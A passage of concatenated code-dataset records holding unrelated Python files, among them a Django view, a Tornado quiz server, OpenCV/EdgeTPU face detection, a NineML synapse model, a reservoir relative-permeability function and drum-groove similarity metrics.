send_from_directory(UPLOAD_FOLDER, filename)\r\n\r\n@app.route(\"/\")\r\n\r\n@app.route(\"/home\")\r\ndef home():\r\n\treturn render_template(\"home.html\")\r\n\r\n@app.route(\"/about\")\r\ndef about():\r\n\treturn render_template(\"about.html\")\r\n\r\n@app.route(\"/caption\")\r\ndef caption():\r\n return render_template(\"index.html\")\r\n\r\nif __name__ == \"__main__\":\r\n\tapp.run(debug=True)\r\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"165276353","text":"from django.shortcuts import render\nfrom products.models import Artist, Category, Room, Hashtag\nfrom django.db import models\nfrom django.apps import apps\nfrom pictures_on_the_wall.utils import special_filter\n\ndef index(request):\n \"\"\"A view that displays the landing page\"\"\"\n return render(request, \"index.html\")\n\ndef index_no_intro(request, filter_group=\"category\"):\n \"\"\"The view that displays the landing page without the intro, so users\n already on the page don't get disrupted by the intro every time\n they go back to the home page\"\"\"\n # Different filtering can be selected, therefore links and page content \n # need presetting\n possible_filters = (\n \"category\",\n \"artist\",\n \"room\",\n \"hashtag\"\n )\n others = []\n # creating a list for the unselected potential other filters\n for filt in possible_filters:\n if filt == filter_group:\n continue\n else:\n others.append(filt)\n \n # Pick the Model for the selected filter\n SelectedModel = apps.get_model('products', filter_group)\n print(f\"SelectedModel {SelectedModel}\")\n # collecting the instances from the selected model\n filter_group_queryset = SelectedModel.objects.all()\n print(f\"filter_group_queryset: a selected modelbol minden Product {filter_group_queryset}\")\n # create a list of sample Products that represents each instance in the model\n sample_list = []\n for item in filter_group_queryset:\n sample_prod = special_filter(filter_group, str(item)).order_by('id').first()\n sample_list.append(sample_prod)\n\n # organise the QuerySets and the sample Products into a list of lists,\n # so it is easy to handle on the frontend in a for loop\n items = []\n for i, item in enumerate(filter_group_queryset):\n # each inner list consists of the QuerySet item and the corresponding sample\n items.append([item, sample_list[i]])\n\n if SelectedModel == Hashtag:\n print(\"Hashtag selected, THIS IS NOT GOOODDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD\")\n # HASHTAGS to be excluded from filtering \n\n page_structure = {\n 'filter_by': filter_group,\n 'others': others,\n 'items': items\n }\n\n print(page_structure)\n\n return render(request, 'index_no_intro.html', {'data': page_structure})\n","sub_path":"home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"356936238","text":"import os\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as plticker\nfrom config import Config\nfrom data_utils import CoNLL2003Dataset, CoNLL2005Dataset, SemcorDataset, \\\n get_vocabs, get_glove_vocab, load_vocab,\\\n get_processing_word, UNK, NUM, START, PAD, EOS,\\\n write_vocab, get_char_vocab, generate_semcor_data,\\\n split_dataset_traindevtest, write_linebased,\\\n export_trimmed_glove_vectors\n\nconfig = Config()\n\ndef getIdx2Tag():\n idx_to_tag = dict()\n i = 0\n with open('data/semcor/tags.txt', 'r') as f:\n for line in f:\n idx_to_tag[i] = line.strip()\n i+=1\n return idx_to_tag\n\ndef getTagDist(dataset, idx2tag):\n freq = dict()\n for x,y,z in dataset:\n labels = list(map(idx2tag.get, y))\n for l in labels:\n if l.startswith('B'):\n c = freq.setdefault(l,0)\n freq[l] = c+1\n counts = np.array(list(freq.values()))\n dist = counts / np.sum(counts)\n return dist, len(dist), counts\n\ntrain = SemcorDataset(config.semcor.filename_train, \n config.processing_word,\n config.semcor.processing_tag, \n config.max_iter)\n\ndev = SemcorDataset(config.semcor.filename_dev, \n config.processing_word,\n config.semcor.processing_tag, \n config.max_iter)\n\ntest = SemcorDataset(config.semcor.filename_test, \n config.processing_word,\n config.semcor.processing_tag, \n config.max_iter)\n\nidx2tag = getIdx2Tag()\n\ntrain_dist, l1, c1 = getTagDist(train, idx2tag)\nprint(l1, c1)\ndev_dist, l2, c2 = getTagDist(dev, idx2tag)\nprint(l2, c2)\ntest_dist, l3, c3 = getTagDist(test, idx2tag)\nprint(l3, c3)\n\n\nplt.style.use('presentation')\n\nfig, ax =plt.subplots()\nindex = np.arange(l1)*2 \nbar_width = 0.5\nopacity=0.8\n\nr1 = ax.bar(index, train_dist, bar_width, label='train')\nr2 = ax.bar(index + bar_width, dev_dist, bar_width, label='dev')\nr3 = ax.bar(index + 2 * bar_width, test_dist, bar_width, label='test')\n\nplt.xlabel('Super Sense (# total = 41)')\nplt.ylabel('Normalised Frequency')\nplt.title('Distribution of label tags in each subset')\nplt.xticks((index+bar_width)[::5], (index/2)[::5])\n# ax.xaxis.set_major_locator(plticker.MultipleLocator(10))\n\nplt.legend()\n#plt.tight_layout()\nplt.show()\n","sub_path":"statistics.py","file_name":"statistics.py","file_ext":"py","file_size_in_byte":2479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"290977369","text":"# uncompyle6 version 3.7.0\n# Python bytecode 2.4 (62061)\n# Decompiled from: Python 3.8.1 (tags/v3.8.1:1b293b6, Dec 18 2019, 22:39:24) [MSC v.1916 32 bit (Intel)]\n# Embedded file name: C:\\Cygwin\\home\\toonpub\\player_1_0_46_qa\\toontown\\src\\parties\\DistributedPartyValentineJukeboxActivity.py\nfrom toontown.parties.DistributedPartyJukeboxActivityBase import DistributedPartyJukeboxActivityBase\nfrom toontown.parties import PartyGlobals\n\nclass DistributedPartyValentineJukeboxActivity(DistributedPartyJukeboxActivityBase):\n __module__ = __name__\n notify = directNotify.newCategory('DistributedPartyJukeboxActivity')\n\n def __init__(self, cr):\n DistributedPartyJukeboxActivityBase.__init__(self, cr, PartyGlobals.ActivityIds.PartyValentineJukebox, PartyGlobals.PhaseToMusicData)\n\n def load(self):\n DistributedPartyJukeboxActivityBase.load(self)\n newTexture = loader.loadTexture('phase_13/maps/tt_t_ara_pty_jukeboxValentineA.jpg', 'phase_13/maps/tt_t_ara_pty_jukeboxValentineA_a.rgb')\n case = self.jukebox.find('**/jukeboxGlass')\n if not case.isEmpty():\n case.setTexture(newTexture, 1)\n body = self.jukebox.find('**/jukeboxBody')\n if not body.isEmpty():\n body.setTexture(newTexture, 1)","sub_path":"2011-web-sv1.0.46.1/modules_decompiled/toontown/parties/DistributedPartyValentineJukeboxActivity.py","file_name":"DistributedPartyValentineJukeboxActivity.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"274452751","text":"filename = \"/home/antonio/Progetto Grafica/lines/tappog.lines\"\nlines = lines2lines(filename)\nrobiewall = STRUCT(AA(POLYLINE)(lines)) \nV,FV,EV,polygons = larFromLines(lines)\nVV = AA(LIST)(range(len(V)))\nsubmodel = STRUCT(MKPOLS((V,EV)))\n#VIEW(larModelNumbering(1,1,1)(V,[VV,EV,FV],submodel,0.01))\n\nW = (((mat(V) - V[0]) * 438.31) + [.5,.5]).tolist()\n\ntemp = 266.948649\n\nW[7]=[temp,W[7][1]]\nW[4]=[temp,W[4][1]]\nW[5]=[temp,W[5][1]]\n\ntappogM = (W,[FV[1]]+[FV[0]])\ntappogP = [-5,-alzo0,sfspac]\n\ntappog = larModelProduct([tappogM,larQuote1D(tappogP)])\n\nW[7] = SUM([W[7],[-larghezzaB,-larghezzaB]])\nW[4] = SUM([W[4],[-larghezzaB,larghezzaB]])\nW[5] = SUM([W[5],[-larghezzaB,larghezzaB]])\nW[9] = SUM([W[9],[larghezzaB,larghezzaB]])\nW[2] = SUM([W[2],[larghezzaB,larghezzaB]])\nW[3] = SUM([W[3],[larghezzaB,-larghezzaB]])\n\ntfstileP = [-5,-alzo0,bordino,-bordino,2*bordino]\ntappoGstile = larModelProduct([tappogM,larQuote1D(tfstileP)])\n\n","sub_path":"266319/models/tappog.py","file_name":"tappog.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"646310412","text":"\n\"\"\"\n\nDynamic synaptic weight implementing phenomenological short term\ndepression and facilitation.\n\n Description:\n\n Implemented is the ODE form of the short-term depression and\n facilitation model as described Eq (2) and Eq (3) in [1] or Eq (6)\n in [2], whereby Eq (2) in [1] seems to have an error in the\n subscript of u_{n+1}. It should be u_{n}.\n\n The model corresponds to the markram_synapse in NEST, which is a\n simplification of the NEST tsodyks_synapse (synaptic time course is\n neglected).\n\n References:\n\n [1] Markram, Wang, Tsodyks (1998) Differential Signaling via the same axon\n of neocortical pyramidal neurons. PNAS, vol 95, pp. 5323-5328.\n\n [2] D. Sussillo, T. Toyoizumi, and W. Maass. Self-tuning of neural circuits through\n short-term synaptic plasticity. Journal of Neurophysiology, 97:4079-4095, 2007.\n\nAuthor: Eilif Muller, 2010.\n\n\"\"\"\n\nimport nineml.abstraction_layer as nineml\n\n\nregimes = [\n nineml.Regime(\n \"dR/dt = (1-R)/tau_r\", # tau_r is the recovery time constant for depression\n \"du/dt = -(u-U)/tau_f\", # tau_f is the time constant of facilitation\n transitions=nineml.On(nineml.SpikeInputEvent,\n do=[\"Wout = u*R*Win\",\n \"R -= u*R\",\n \"u += U*(1-u)\",\n nineml.PreEventRelay]) # Should I put a SpikeOutputEvent here?\n )]\n\nports = [nineml.SendPort(\"Wout\")]\n\nc1 = nineml.Component(\"MarkramSynapseDynamics\", regimes=regimes, ports=ports)\n\n# write to file object f if defined\ntry:\n # This case is used in the test suite for examples.\n c1.write(f)\nexcept NameError:\n import os\n\n base = \"markram_synapse_dynamics\"\n c1.write(base + \".xml\")\n c2 = nineml.parse(base + \".xml\")\n assert c1 == c2\n\n c1.to_dot(base + \".dot\")\n os.system(\"dot -Tpng %s -o %s\" % (base + \".dot\", base + \".png\"))\n","sub_path":"lib9ml/python/nineml/examples/examples_from_trunk_pre_merge/AL/markram_synapse_dynamics.py","file_name":"markram_synapse_dynamics.py","file_ext":"py","file_size_in_byte":1914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"569555793","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport logging\nimport functools\n\nimport tornado.auth\nimport tornado.web\nimport tornado.ioloop\nimport tornado.database\nimport tornado.httpserver\n\nfrom backgroundworker import worker_switch\n\nfrom db import ConnectDB\nfrom main import IndexHandler, BroadcastHandler, DownloadHandler, AnswerHandler, LoginHandler, UserHandler, LogoutHandler\n\nfrom config import site_config\n\n\nclass Application(tornado.web.Application):\n\n listeners = []\n online_users = []\n\n def __init__(self):\n handlers = [\n (r'/answer', AnswerHandler),\n (r'/download', DownloadHandler),\n (r'/login', LoginHandler),\n (r'/logout', LogoutHandler),\n (r'/new', UserHandler),\n (r'/', IndexHandler),\n (r'/broadcast', BroadcastHandler),\n ]\n settings = dict(\n site_title=site_config[\"site_title\"],\n template_path=os.path.join(os.path.dirname(__file__), 'templates'),\n static_path=os.path.join(os.path.dirname(__file__), \"static\"),\n xsrf_cookies=True,\n debug=True,\n cookie_secret='3295bfab668c4ad48dad43f890402905',\n login_url='/login',\n )\n tornado.web.Application.__init__(self, handlers, **settings)\n self.session = ConnectDB()\n\nif __name__ == '__main__':\n logging.getLogger().setLevel(logging.ERROR)\n app = Application()\n loop = tornado.ioloop.IOLoop.instance()\n tornado.ioloop.PeriodicCallback(functools.partial(worker_switch, app), 40000, loop).start()\n http_server = tornado.httpserver.HTTPServer(app)\n http_server.listen(int(8888))\n loop.start()\n","sub_path":"TornadoQuizz/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"408804996","text":"#!/usr/bin/env python3\n\n# OpenCV program to detect face in real time from webcam footage.\nimport cv2\nfrom PIL import Image\n\ndef make_tflite_face_getter():\n from edgetpu.detection.engine import DetectionEngine\n camera = cv2.VideoCapture(0)\n cameraIndex = 0\n if not camera.isOpened():\n camera = cv2.VideoCapture(1)\n cameraIndex = 1\n \n width, height = int(camera.get(3)), int(camera.get(4))\n \n engine = DetectionEngine('./models/mobilenet_ssd_v2_face_quant_postprocess_edgetpu.tflite')\n \n def zoomer():\n nonlocal cameraIndex\n nonlocal camera\n \n if not camera.isOpened():\n camera.release()\n print(\"[error] couldn't open camera. Aborting and trying new index.\")\n cameraIndex += 1\n cameraIndex = cameraIndex % 2\n camera = cv2.VideoCapture(cameraIndex)\n return []\n \n success, img = camera.read()\n if not success:\n print(\"[error] Could't read from webcam.\")\n return []\n \n ans = engine.detect_with_image(\n Image.fromarray(img),\n threshold=0.05,\n keep_aspect_ratio=False,\n relative_coord=False,\n top_k=10\n )\n \n def result_getter(face):\n x, y, x2, y2 = list(map(int, face.bounding_box.flatten().tolist()))\n w = x2 - x\n h = y2 - y\n return (img[y:y + h, x:x + w], (x, y))\n \n if ans:\n return list(map(result_getter, ans))\n return []\n return zoomer, width, height\n \ndef make_webcam_face_getter():\n # imageCount = 0\n # Hooks up camera to the default video capture device.\n camera = cv2.VideoCapture(0)\n cameraIndex = 0\n if not camera.isOpened():\n camera = cv2.VideoCapture(1)\n cameraIndex = 1\n\n width, height = int(camera.get(3)), int(camera.get(4))\n\n # The classifier we use. HAAR is slower than some other options, but\n # is more accurate. We can tune this later.\n faceCascade = cv2.CascadeClassifier(\"./models/haarcascade_frontalface_default.xml\")\n\n def zoomer():\n nonlocal cameraIndex\n # nonlocal imageCount\n nonlocal camera\n\n if not camera.isOpened():\n camera.release()\n print(\"[error] couldn't open camera. Aborting and trying new index.\")\n cameraIndex += 1\n cameraIndex = cameraIndex % 2\n camera = cv2.VideoCapture(cameraIndex)\n return []\n\n success, img = camera.read()\n\n if not success:\n print(\"[error] Could't read from webcam.\")\n return []\n\n greyscale = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n # Perform the detection with some standard params.\n faces = faceCascade.detectMultiScale(\n greyscale,\n minSize=(100, 100),\n )\n if len(faces) == 0:\n return []\n\n # faces = [max(faces, key=lambda f: f[2] * f[3])] # PICK BIGGEST FACE\n extract_face = lambda f: (img[f[1]:f[1] + f[3], f[0]:f[0] + f[2]], (f[0], f[1]))\n\n # face_filter = lambda f: f[2] > 100 and f[3] > 100\n # faces = filter(face_filter, faces)\n\n face_imgs = map(extract_face, faces)\n\n return list(face_imgs)\n # success = cv2.imwrite(\"images/\" + str(imageCount) + '.jpg', colorFace)\n\n # if not success:\n # print(\"[error] Failed to write image to file.\")\n # return False\n # imageCount += 1\n\n return zoomer, width, height\n","sub_path":"webcam_face_extractor.py","file_name":"webcam_face_extractor.py","file_ext":"py","file_size_in_byte":3561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"617514275","text":"\"\"\"\nreservoir simulation assignment 1\nCapillary pressure and relative permeability: Relative permeability\nAuthor: Mohammad Afzal Shadab\nEmail: mashadab@utexas.edu\nDate modified: 9/10/2020\n\"\"\"\nimport numpy as np\n\ndef rel_perm(petro,Sw):\n \"\"\"s: saturation, s_wp: wetting percolation threshold, s_nwp: non-wetting percolation threshold, mu: viscosity, k_0: relative permeability threshold, n: power law parameter\"\"\"\n \n S =(Sw - petro.Swr)/(1.0 - petro.Sor - petro.Swr) #Normalized saturation\n krw = petro.krw0 * S**petro.nw #Corey-Brooks model\n kro = petro.kro0 *(1.0-S)**petro.no #Corey-Brooks model\n\n #implementing percolation threshold conditions\n #for water phase\n if(Sw <= petro.Swr):\n krw = np.nan\n kro = np.nan\n #for oil phase\n if(Sw >= 1.0-petro.Sor):\n krw = np.nan \n kro = np.nan \n\n return np.array([krw, kro], dtype=np.float64)","sub_path":"HW1/HW 1 Files/Problem 3/rel_perm.py","file_name":"rel_perm.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"248347152","text":"import sys, re\nfrom prepare_create import get_objects\nfrom tools.get_keys import get_nums\n\n# 开始工作\ndef done(obj_name=None):\n\n with open(r'datas/as_model_config.txt','r') as f:\n config_text = f.read()\n config_text = re.sub('HAITON_SECRET', get_nums(), config_text)\n\n with open(r'datas/as_model_manage.txt','r') as f:\n manage_text = f.read()\n\n with open(r'datas/as_model_init.txt') as f:\n init_text = f.read()\n\n objname = obj_name or sys.argv[1]\n\n get_objects(objname,config_text,manage_text,init_text)\n\n\nif __name__ == '__main__':\n done()","sub_path":"auto_config/start_job.py","file_name":"start_job.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"50131295","text":"from xml.dom.minidom import parse\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom matplotlib import pyplot as plt\nimport math\nimport csv\nimport editdistance as edcalc\nfrom scipy import stats\nimport os\nfrom collections import Counter\n\ndef addRelativePathToSystemPath(relPath):\n if __name__ == '__main__' and __package__ is None:\n from os import sys, path\n sys.path.append(path.join(path.dirname(path.abspath(__file__)), relPath))\n\naddRelativePathToSystemPath(\"../shared\")\n\nfrom fx.bfd.groove import *\nfrom fx.common.filesystem import *\n\n\ndef getEuclideanRhythmDistance(a, b, aTiming, bTiming):\n \"\"\"Returns norm-2 of a 1-D numpy array for CPU computation.\n * faster than linalg.norm in case of 1-D arrays (numpy 1.9.2rc1).\n \"\"\"\n\n lA,mA,hA = splitKitParts3Ways(a)\n a = np.hstack([lA,mA,hA])\n lB,mB,hB = splitKitParts3Ways(b)\n b = np.hstack([lB,mB,hB])\n # x is flattened vector (96 long - 3parts x32) of the difference\n\n lAT, mAT, hAT = splitKitParts3Ways(aTiming)\n aTiming = np.nan_to_num(np.hstack([lAT, mAT, hAT]).flatten())*0.05\n lBT, mBT, hBT = splitKitParts3Ways(bTiming)\n bTiming = np.nan_to_num(np.hstack([lBT, mBT, hBT]).flatten())*0.05\n\n aTransform = np.power(a,0.2).flatten()\n bTransform = np.power(b,0.2).flatten()\n\n #timingDifference = (aTiming-bTiming).flatten()\n x = aTransform - bTransform\n #x = (np.power(a,0.2).flatten()-np.power(b,0.2).flatten()) #put velocity weighting in here (as pow)\n\n return math.sqrt(np.dot(x, x.T))\n\ndef getEuclideanRhythmDistance5PartsNoTiming(a,b):\n aTransform = np.power(a,0.2).flatten()\n bTransform = np.power(b,0.2).flatten()\n\n x = (aTransform - bTransform)\n euclideanDistance = math.sqrt(np.dot(x, x.T))\n return euclideanDistance\n\ndef getEuclideanRhythmDistance5Parts(a,b,aTiming, bTiming):\n aTransform = np.power(a,0.2).flatten()\n bTransform = np.power(b,0.2).flatten()\n\n timingDifference = np.nan_to_num((aTiming - bTiming)).flatten() #* 0.0095\n #normalize\n if np.absolute(timingDifference).max() != 0.0:\n timingDifference = timingDifference/np.absolute(timingDifference).max()\n else:\n pass\n w = 1+np.absolute(timingDifference)\n x = (aTransform - bTransform) * w\n\n euclideanDistance = math.sqrt(np.dot(x, x.T))\n return euclideanDistance + (1*getTimingDistanceAverage(aTiming,bTiming))\n\n\ndef getTimingDistanceAverage(aTiming,bTiming):\n # Get timing distance = weighted euclidean distance between average of timing distances.\n # Works as a feature on its own or weighting factor for euclidean distance\n # 1 global weighting for whole thing - not step-by-step distance weightings\n aTimeAverage = np.sum(np.nan_to_num(aTiming), axis=1)\n bTimeAverage = np.sum(np.nan_to_num(bTiming), axis=1)\n aTimeAverage[aTimeAverage==0]=['nan']\n bTimeAverage[bTimeAverage==0]=['nan']\n\n x = np.nan_to_num(aTimeAverage-bTimeAverage).flatten()\n timingDistance = math.sqrt(np.dot(x,x.T)) * 0.0081\n return timingDistance\n\ndef getFlexibleEuclideanDistance(a,b, aTiming, bTiming):\n # get euclidean distance, but with 1 metrical distance lookahead/back\n # 1st thing - recreate euclidean distance with iteration (not array-wise calculation)\n #\n aTransform = np.power(a,0.2)\n bTransform = np.power(b,0.2)\n aTiming = (aTiming)\n bTiming = (bTiming)\n timingDifference = np.nan_to_num(aTiming - bTiming)\n\n # if np.absolute(timingDifference).max() != 0.0:\n # maxTiming = (np.absolute(timingDifference).max() + 125.0)\n # timingDifference = timingDifference/maxTiming\n # else:\n # maxTiming = 125.0\n # pass\n maxTiming = 125.\n timingDifference = timingDifference / 125.\n timingDifference = 1+np.absolute(timingDifference)\n\n # averagetiming not working - needs to be flattened\n averageATiming = np.hstack([np.sum(aTiming, axis=1), np.sum(aTiming, axis=1),\n np.sum(aTiming, axis=1),np.sum(aTiming, axis=1),np.sum(aTiming, axis=1)])\n averageBTiming = np.hstack([np.sum(bTiming, axis=1), np.sum(bTiming, axis=1),\n np.sum(bTiming, axis=1),np.sum(bTiming, axis=1),np.sum(bTiming, axis=1)])\n averageTimingDifference = (averageATiming-averageBTiming) *0.009\n x = np.zeros(aTransform.shape)\n tempo = 120.0\n stepTimeMS = 60.0 * 1000 / tempo / 4 # semiquaver step time in ms\n w = 0.00\n singleTimingDifference = 0\n for j in range(5):\n for i in range(31):\n if aTransform[i,j] != 0.0 and bTransform[i,j] != 0.0:\n x[i,j] = (aTransform[i,j] - bTransform[i,j]) * (timingDifference[i,j])\n #print('match', x[i,j], timingDifference[i,j])\n elif aTransform[i,j] != 0.0 and bTransform[i,j] == 0.0:\n if bTransform[(i+1)%32, j] != 0.0 and aTransform[(i+1)%32, j] == 0.0:\n singleTimingDifference = np.nan_to_num(aTiming[i,j]) - np.nan_to_num(bTiming[(i+1)%32,j]) + stepTimeMS\n if singleTimingDifference < 125.:\n singleTimingDifference = 1 + abs(singleTimingDifference/maxTiming)\n x[i,j] = (aTransform[i,j] - bTransform[(i+1)%32,j]) * singleTimingDifference\n else:\n x[i, j] = (aTransform[i, j] - bTransform[i, j]) * timingDifference[i, j]\n\n # print(singleTimingDifference)\n # print(\"lookahead\", x[i,j])\n #\n # print(\"b+1\", bTransform[(i+1)%32,j])\n # print(\"unedited\",(aTransform[i,j]*timingDifference[i,j]),(bTransform[i,j]*timingDifference[i,j]))\n\n # print('should be smaller',x[i,j])\n elif bTransform[(i-1)%32,j] != 0.0 and aTransform[(i-1)%32, j] == 0.0:\n singleTimingDifference = np.nan_to_num(aTiming[i,j]) - np.nan_to_num(bTiming[(i-1)%32,j]) - stepTimeMS\n\n if singleTimingDifference > -125.:\n singleTimingDifference = 1 + abs(singleTimingDifference/maxTiming)\n # print('should be smaller', x[i, j])\n x[i,j] = (aTransform[i,j] - bTransform[(i-1)%32,j]) * singleTimingDifference\n else:\n x[i, j] = (aTransform[i, j] - bTransform[i, j]) * timingDifference[i, j]\n else:\n x[i, j] = (aTransform[i, j] - bTransform[i, j]) * timingDifference[i, j]\n # print('should be larger', x[i,j])\n\n elif aTransform[i,j] == 0.0 and bTransform[i,j] != 0.0:\n if bTransform[(i + 1) % 32, j] != 0.0 and aTransform[(i + 1) % 32, j] == 0.0:\n singleTimingDifference = np.nan_to_num(aTiming[i,j]) - np.nan_to_num(bTiming[(i+1)%32,j]) + stepTimeMS\n if singleTimingDifference < 125.:\n singleTimingDifference = 1 + abs(singleTimingDifference/maxTiming)\n x[i,j] = (aTransform[i,j] - bTransform[(i+1)%32,j]) * singleTimingDifference\n else:\n x[i, j] = (aTransform[i, j] - bTransform[i, j]) * timingDifference[i, j]\n\n elif bTransform[(i-1)%32,j] != 0.0 and aTransform[(i-1)%32, j] == 0.0:\n singleTimingDifference = np.nan_to_num(aTiming[i,j]) - np.nan_to_num(bTiming[(i-1)%32,j]) - stepTimeMS\n if singleTimingDifference > -125.:\n singleTimingDifference = 1 + abs(singleTimingDifference/maxTiming)\n x[i,j] = (aTransform[i,j] - bTransform[(i-1)%32,j]) * singleTimingDifference\n\n else:\n x[i, j] = (aTransform[i, j] - bTransform[i, j]) * timingDifference[i, j]\n\n else: # if no nearby onsets, need to count difference between onset and 0 value.\n x[i, j] = (aTransform[i, j] - bTransform[i, j]) * timingDifference[i, j]\n\n\n flexDistance = math.sqrt(np.dot(x.flatten(),x.flatten().T))\n #print(flexDistance)\n\n if flexDistance < 0.5:\n pass\n # print(x)\n # print(aTransform,bTransform)\n # print(x)\n # print(aTiming)\n # print(bTiming)\n return flexDistance\n # go through a, and if hit[i] in b = 0, check hit [i+1] and [i-1]\n\ndef getSwingFeatures(aTiming, bTiming, aName, bName):\n # first - get probability of swing\n # swing positions - 4th semiquavers. Tested 'soft swing' semiquaver positions before - doesn't work'\n swingPositions = 3,7,11,15,19,23,27,31\n\n\n aTimeAverage = np.sum(np.nan_to_num(aTiming), axis=1)\n bTimeAverage = np.sum(np.nan_to_num(bTiming), axis=1)\n aTimeAverage[aTimeAverage==0]=['nan']\n bTimeAverage[bTimeAverage==0]=['nan']\n\n aSwingCount = 0.0\n bSwingCount = 0.0\n oneStep = 125.0\n secondQuaversA = np.zeros([8])\n secondQuaversB = np.zeros([8])\n\n j=0 #check for swung notes\n for i in swingPositions:\n if aTimeAverage[i] < -25.0:\n aSwingCount += 1\n secondQuaversA[j] = 125.0 - aTimeAverage[i]\n if bTimeAverage[i] < - 25.0:\n bSwingCount += 1\n secondQuaversB[j] = 125.0 - bTimeAverage[i]\n j+=1\n shortQuaverA = np.mean(secondQuaversA[secondQuaversA!=0])\n shortQuaverB = np.mean(secondQuaversB[secondQuaversB!=0])\n\n #check for triplet notes\n tripletPositions = 1,5,9,13,17,21,25,29\n aTripletCount = 0.0\n bTripletCount = 0.0\n\n for i in tripletPositions:\n if aTimeAverage[i] > 35.0:\n aTripletCount+=1\n if bTimeAverage[i] > 35.0:\n bTripletCount += 1\n\n longQuaverA = 500.0 - shortQuaverA\n longQuaverB = 500.0 - shortQuaverB\n\n swingRatioA = longQuaverA / shortQuaverA\n swingRatioB = longQuaverB / shortQuaverB\n if np.isnan(swingRatioA):\n swingRatioA = 1.0\n if np.isnan(swingRatioB):\n swingRatioB = 1.0\n #print(swingDistance, aName, bName)\n\n # print(aSwingCount,aTripletCount, aName)\n # print(bSwingCount,bTripletCount, bName)\n # if aName == 'Country Swing Fill 13':\n # print(aTiming)\n # print(aTimeAverage)\n aSwing = np.ceil(aSwingCount/8.0)\n bSwing = np.ceil(bSwingCount/8.0)\n\n unweightedDistance = abs(aSwing - bSwing)\n\n swingSalienceWeight = 1+ abs(aSwingCount/8.0 - bSwingCount/8.0)\n swingRatioWeight = 1+abs(swingRatioA-swingRatioB)\n\n wA = pow(aSwingCount/8.0,0.1)\n wB = pow(bSwingCount/8.0,0.1)\n # wA = pow((aSwingCount/8.0 + swingRatioA),2)\n # wB = pow((bSwingCount/8.0 + swingRatioB),2)\n #print(wA,wB)\n # print(wA, 'A swing salience', swingRatioA, aSwingCount)\n # print(wB, 'B swing salience', swingRatioB, bSwingCount)\n\n swingDistance = abs((wA) - (wB))#*unweightedDistance #=1 - one is swung and other isn't. =0 - both swung/both unswung. 1 diff 0 same\n #swingDistance = abs(np.ceil(aTripletCount/8.0) - np.ceil(bTripletCount/8.0))\n # need to reduce 1 values according to swing salience. if swing s is low, reduce. if high don't reduce/reduce less/\n #print('Weighted Distance = ', swingDistance, 'Unweighted = ', unweightedDistance, aName, bName)\n return swingDistance# * swingRatioWeight * swingSalienceWeight\n\ndef getTimingStyle(aTiming,bTiming,aName, bName):\n # for each step, see if there is a kick or snare present\n # then see if there is a hihat present?\n # count boolean features for each bar individually\n # in tweaking - need to make sure loops in the same palette/genre are the same\n\n lA,mA,hA = splitKitParts3Ways(aTiming)\n a = np.vstack([lA,mA,hA]).T\n lB,mB,hB = splitKitParts3Ways(bTiming)\n b = np.vstack([lB,mB,hB]).T #need to go back to nan values\n aBar1,aBar2 = np.split(a,2)\n bBar1,bBar2 = np.split(b,2)\n aBooleanFeatures = np.clip(getBooleanFeatures(aBar1),0,1)\n bBooleanFeatures = np.clip(getBooleanFeatures(bBar1),0,1)\n #print(aBooleanFeatures, aName)\n #print(bBooleanFeatures, bName)\n # print(a)\n # print(b)\n #print(\"\\n\")\n x = aBooleanFeatures-bBooleanFeatures\n\n distance = math.sqrt(np.dot(x, x.T))\n\n return distance\n\ndef getBooleanFeatures(timing):\n # just one bar\n features = np.zeros([16])\n\n # booleanFeatures\n # 0 'kickLate1'\n # 1 'kickEarly1'\n # 2 'snareLate2'\n # 3 'snareEarly2'\n # 4 'kickLate3'\n # 5 'kickEarly3'\n # 6 'snareLate4'\n # 7 'snareEarly4'\n #\n # 8 'kickHHLateGrid1'\n # 9'kickHHEarlyGrid1'\n # 10'snareHHLateGrid2'\n # 11'snareHHEarlyGrid2'\n # 12'kickHHLateGrid3'\n # 13'kickHHEarlyGrid3'\n # 14'snareHHLateGrid4'\n # 15'snareHHEarlyGrid4'\n # }\n# check hihat OR kick/snare.\n for k in 0,2:\n kickT1 = timing[0+k,0]\n hhT1 = timing[0+k,2]\n snT2 = timing[4+k,1]\n hhT2 = timing[4+k,2]\n kickT3 = timing[8+k,0]\n hhT3 = timing[8+k,2]\n snT4 = timing[12+k,1]\n hhT4 = timing[12+k,2]\n\n t = 10.0\n if kickT1 > t or hhT1 > t:\n features[0] = 1\n if kickT1 < -t or hhT1 < -t:\n features[1] = 1\n if snT2 > t or hhT2 > t:\n features[2] = 1\n if snT2 < -t or hhT2 < -t:\n features[3] = 1\n\n if kickT3 > t or hhT3 > t:\n features[4] = 1\n if kickT3 < -t or hhT3 < -t:\n features[5] = 1\n if snT4 > t or hhT4 > t:\n features[6] = 1\n if snT4 < -t or hhT4 < -t:\n features[7] = 1\n\n if kickT1 > hhT1 + t:\n features[8] = 1\n if kickT1 < hhT1 -t:\n features[9] = 1\n if snT2 > hhT2 + t:\n features[10] = 1\n if snT2 < hhT2 -t:\n features[11] = 1\n\n if kickT3 > hhT3 + t:\n features[12] = 1\n if 